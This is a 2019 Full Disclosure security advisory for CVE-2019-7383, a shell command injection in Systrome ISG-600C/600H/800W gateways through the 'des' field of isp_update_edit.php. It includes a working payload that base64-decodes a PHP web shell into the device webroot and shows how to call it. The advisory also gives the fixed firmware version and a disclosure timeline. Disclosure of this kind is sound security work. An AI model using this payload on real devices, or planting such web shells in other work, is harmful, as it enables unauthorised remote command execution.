Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

KSA-Dev-003:CVE-2019-7383 : Remote Code Execution Via shell upload in all systorme ISG products

Related Vulnerabilities: CVE-2019-7383  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="31"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#32">By Date</a>
<a href="33"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="31"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#32">By Thread</a>
<a href="33"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">KSA-Dev-003:CVE-2019-7383 : Remote Code Execution Via shell upload in all systorme ISG products</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Kingkaustubh via Fulldisclosure &lt;fulldisclosure () seclists org&gt;


<em>Date</em>: Tue, 12 Feb 2019 14:36:15 +0530


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">=====================================
Authenticated Shell Command Injection
=====================================

. contents:: Table Of Content

Overview
========

Title : Authenticated Shell command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7383
Vendor: Systrome Networks (<a rel="nofollow" href="http://systrome.com/about/">http://systrome.com/about/</a>)
Products:
         1.ISG-600C
         2.ISG-600H
         3.ISG-800W


Tested Version: : ISG-V1.1-R2.1_TRUNK-20181105.bin(Respetive for others)
Severity: High--Critical

Advisory ID
============
KSA-Dev-003


About the Product:
==================

Cumilon ISG-* cloud gateway is the security product developed by Systrome for the distributed access network for the 
cloud-computing era. It integrates the L2-L7security features of the next-generation firewall, is based on the user 
identification and application identification and provides the application-layer firewall, intrusion prevention, 
anti-virus, anti-APT, VPN, intelligent bandwidth management, multi-egress link load balancing, content filtering, URL 
filtering, and other security functions. It provides the cloud interface. The security cloud management platform based 
on the big data platform architecture can monitor the network topology and device status in real time, simplifying the 
online deployment of the professional device via the auto configuration delivery. The real-time monitoring of the 
mobile terminal reduces the maintenance cost and makes the security visible at any time and anywhere. Systrome cloud 
gateway is the best access security choice of the middle and small enterprises, branch interconnection, and chain 
enterprises.

Description: 
============
An issue was discovered on Systrome Cumilon ISG-600C, ISG-600H, and ISG-800W devices with firmware 
V1.1-R2.1_TRUNK-20181105.bin.
A shell command injection occurs by editing the description of an ISP file. The file network/isp/isp_update_edit.php 
does not properly validate user input, which leads to shell command injection via the des parameter.

[Additional_information]

The php file ./network/isp/isp_update_edit.php dose not properly validate the user input which leads to to shell 
command injection.
below is the vulnerable code snipet  "&lt;td&gt;&lt;input name="des" id="des" value="&lt;?php echo $item['des'];?&gt;" type="text" 
&lt;?php echo $item['des'];?&gt; size="50" maxlength="&lt;?php echo XML_MAX_DESC_LEN;?&gt;"/&gt;&lt;"

[VulnerabilityType Other]
Authenticated Shell Command Injection


[Affected Component]
The php file ./network/isp/isp_update_edit.php dose not properly validate the user input which leads to to shell 
command injection.
below is the vulnerable code snippet  "&lt;td&gt;&lt;input name="des" id="des" value="&lt;?php echo $item['des'];?&gt;" type="text" &lt;?

[Attack Type]
Local


[Impact Code execution]
true


[Attack Vectors]

visit the url <a rel="nofollow" href="http://device_ip/network/isp/isp_update_edit.php?pv=ISP_INTL.dat">http://device_ip/network/isp/isp_update_edit.php?pv=ISP_INTL.dat</a>
adding the strings below will add a php system command shell in the webroot of the device:
'`echo PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4KCg== | base64 -d &gt; /usr/local/wwwroot/cmd.php`' 

the php system shell can then be accessed via browser, e.g: <a rel="nofollow" href="http://device_ip/cmd.php?cmd=ifconfig">http://device_ip/cmd.php?cmd=ifconfig</a>


Mitigation
==========

This issue is fixed in ISG-V1.1-R2.1_TRUNK-20181229.bin

Disclosure: 
===========
10-Dec-2018 Discoverd the Vulnerability
10-DEC-2018 Reported to vendor 
04-JAN-2019 Recived the fixed from vendor
04-JAN-2019 Request for the CVE-ID
04-FEB-2019 CVE ID Assign.
08-FEB-2019 Advisiory Published.

[Discoverer]
* Kaustubh Padwad, 
* Information Security Researcher
* kingkaustubh () me com
* <a rel="nofollow" href="https://s3curityb3ast.github.io/">https://s3curityb3ast.github.io/</a>
* <a rel="nofollow" href="https://twitter.com/s3curityb3ast">https://twitter.com/s3curityb3ast</a>
* <a rel="nofollow" href="http://breakthesec.com">http://breakthesec.com</a>
* <a rel="nofollow" href="https://www.linkedin.com/in/kaustubhpadwad">https://www.linkedin.com/in/kaustubhpadwad</a>



_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a>

</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="31"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#32">By Date</a>
<a href="33"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="31"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#32">By Thread</a>
<a href="33"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>KSA-Dev-003:CVE-2019-7383 : Remote Code Execution Via shell upload in all systorme ISG products</strong> <em>Kingkaustubh via Fulldisclosure (Feb 12)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started